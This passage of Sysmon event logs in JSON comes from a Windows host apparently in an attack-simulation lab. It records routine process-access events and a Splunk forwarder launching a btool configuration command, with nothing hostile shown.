07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.854\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nProcessId: 4568\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nParentProcessId: 4400\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.854","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010725C0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010435B0500}","ParentProcessId":"4400","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nSourceProcessId: 4400\r\nSourceThreadId: 656\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","SourceProcessId":"4400","SourceThreadId":"656","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010725C0500}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010725C0500}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 